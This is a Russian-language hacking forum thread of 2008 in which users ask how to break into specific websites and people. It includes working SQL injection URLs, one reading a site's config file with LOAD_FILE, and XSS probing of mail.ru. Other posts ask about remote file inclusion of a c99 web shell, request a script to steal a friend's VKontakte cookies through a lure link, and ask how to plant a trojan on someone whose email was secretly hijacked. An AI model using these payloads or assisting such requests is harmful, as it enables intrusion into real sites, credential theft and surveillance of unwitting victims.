Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.pryanishnikov.ru/we.php?str=
    тут есть инклуд? а то у мя невыходит замутить
     
  2. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Нету вроде.
     
  3. none222

    none222 Guest

    Reputations:
    0
    есть, но нуль-байт экранизируется ковычками. Если бы мэджик квотс было бы офф - удалось бы реализовать
     
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Активка на мейле?

    - логонимся на мейл.ру
    - идем в Фото http://foto.mail.ru/
    - берем картинку в формате JPEG, переименовываем в xss<hr>.jpg
    - заливаем http://foto.mail.ru/cgi-bin/photo/addphoto
    -- ставим галку Использовать имя файла как название фото
    - идем в альбом, зрим загруженную картинку, тыкаем Показать фото другу, вписываем мыльик и отправлем
    - идем в ящик, видим, что тег <hr> не вырезался ..

    собственно вопрос - заюзать можно, или фильтрация (да, там фильтрация все-же есть) слишком сильная?

    [​IMG]
     
  5. none222

    none222 Guest

    Reputations:
    0
    возможно, проверь сам или стукни мне в аську - когда буду онлан;)

    ХР - неопасный тег, возможно (скорее всего) он не фильтруется, а опасные фильтруются
     
  6. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    Вот вопросик:
    по запросу www.site.ru/id=1'
    выдаёт
    Notice: Undefined index: controller in /home/virtwww/w_new-la2life_fec2852b/http/cake/dispatcher.php on line 168 (В шапке)
    (на странице)
    можно с этим чё сделать?)
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    50\50
    надо смотреть
     
  8. Кубик Рубик

    Joined:
    10 Apr 2008
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    На запрос videos.php?cat_id=28' Отвечает:
    Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3

    Что можно предпринять? :confused:
     
    #3248 Кубик Рубик, 14 Sep 2008
    Last edited: 14 Sep 2008
  9. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    можно предпринять sql иньекцию ..
     
    1 person likes this.
  10. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4

    videos.php?cat_id=28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    {4} вывод.
    _http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    и там еще кусочек файла прочитать можно
    _http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F7777772F68746D6C2F736974652F636F6E662F636F6E6669672E706870),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

    все благодаря SIPT :)
    думаю я сайт угадал)
     
  11. GenaD

    GenaD Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    68
    Likes Received:
    10
    Reputations:
    -3
    Parse error: syntax error, unexpected $end in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php(69) : regexp code on line 1 Fatal error: preg_replace(): Failed evaluating code: check_module('main', '
    ', 'format:\') in /home/httpd/vhosts/xxxx.ru/httpdocs/index.php on line 69
    ДАную ошибку как можно использовать?
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    никак
     
    1 person likes this.
  13. Rejjin

    Rejjin Elder - Старейшина

    Joined:
    20 Jul 2008
    Messages:
    83
    Likes Received:
    46
    Reputations:
    0
    У меня такой вопрос: можно ли заливать шелл таким способом. http://site.ru/index.php?page=file://localhost/SDMMC/c99shell.php. Или что то этому помешает?
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Rejjin, эээ...ты хоть напиши что в index.php на эту переменную о_О, а то можно написать и такое, что по этому запросу будет голая жопа во весь экран :) Вообщем, всё скрипта зависит.
     
  15. none222

    none222 Guest

    Reputations:
    0
    Rejjin, =file:// - так нельзя. Можно через http и через ftp инклудить
     
  16. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    и про php://input (сырые пост данные) не забудем
     
  17. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Да боже мой. Каким боком ты собрался инклудить файл, расположенный у тебя на машине?? localhost - это твой локальный адрес, доступный только с твоего компьютера...
    Мда (с)

    Помешает отсутствие мозгов. Причём сильно.
     
    2 people like this.
  18. maximkafun

    maximkafun New Member

    Joined:
    19 May 2008
    Messages:
    25
    Likes Received:
    3
    Reputations:
    -9
    Всем доброе время суток!вот в чём вопрос,мне нужно скрипт который запишет куки в отдельный файл жертвы которая перешла на эту страницу.Например:Я бросаю Вконтакте ссылку другу,говорю типа глянь какие тёлки, он переходит и его куки переходят ко мне.спс за помощь
     
  19. none222

    none222 Guest

    Reputations:
    0
    без уязвимости xss, ты куки не сможешь сохранить на своём сервере. Только реферер (из относящихся к сайту), который ты и атк знаешь.

    Если есть xss, то гугли на кейворд php сниффер
     
  20. perdunex

    perdunex New Member

    Joined:
    14 Sep 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Сразу извиняюсь, если не туда пишу .
    Есть доступ к майлу жертвы .Человек не знает , что его ящик взломан .Так же есть полный доступ к странице вконтакте .Можно ли как , то попасть на компьютер жертвы (залезть в него) .Залить троян на маил (отправить от лица жертве самому себе) или еще как то ?
     
Thread Status:
Not open for further replies.